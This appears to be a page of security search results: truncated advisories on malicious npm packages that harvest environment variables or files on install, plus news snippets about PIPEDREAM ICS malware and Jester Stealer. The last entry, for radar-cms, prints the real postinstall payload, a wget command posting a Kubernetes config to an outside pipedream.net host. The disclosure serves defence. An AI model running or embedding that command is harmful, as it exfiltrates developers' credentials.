10 matches found
MAL-2026-6467 Malicious code in @vpms/design-system (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43ce5813fba2660b094a3e8a5c5a0bf2f1972530c294830c0a2e3d15dcd1b096 package.json declares preinstall="node index.js". On every npm install, index.js iterates process.env and harvests any variable whose name contains...
MAL-2026-5723 Malicious code in @ci-lifecycle-test/postinstall-ping (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509 The package's postinstall lifecycle script postinstall.js executes automatically on npm install and POSTs the JSON-serialized contents of the entire...
Malicious code in pipedream-curl (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c8b5e047b6a8fdba2b0c3473a51edbdb9b488f22377ca3a66bb206193e7da7e5 The OpenSSF Package Analysis project identified 'pipedream-curl' @ 1.0.1 npm as malicious. It is considered malicious because: - The package...
MAL-2024-11821 Malicious code in pipedream-curl (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c8b5e047b6a8fdba2b0c3473a51edbdb9b488f22377ca3a66bb206193e7da7e5 The OpenSSF Package Analysis project identified 'pipedream-curl' @ 1.0.1 npm as malicious. It is considered malicious because: - The package...
PIPEDREAM Malware against Industrial Control Systems
Another nation-state malware, Russian in origin: In the early stages of the war in Ukraine in 2022, PIPEDREAM, a known malware was quietly on the brink of wiping out a handful of critical U.S. electric and liquid natural gas sites. PIPEDREAM is an attack toolkit with unmatched and unprecedented...
Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware
The Computer Emergency Response Team of Ukraine CERT-UA has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-laced Microsoft Excel...
Industrial Control System Malware Discovered
The Department of Energy, CISA, the FBI, and the NSA jointly issued an advisory describing a sophisticated piece of malware called Pipedream thats designed to attack a wide range of industrial control systems. This is clearly from a government, but no attribution is given. Theres also no indicati...
Feds Uncover a ‘Swiss Army Knife’ for Hacking Industrial Systems
The malware toolkit, known as Pipedream, is perhaps the most versatile tool ever made to target critical infrastructure like power grids and oil refineries...
Exploit for Server-Side Request Forgery in Vmware Cloud_Foundation
CVE-2021-21975 SSRF-POC - ssrf to cred leak First configur...
Malicious Package
Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...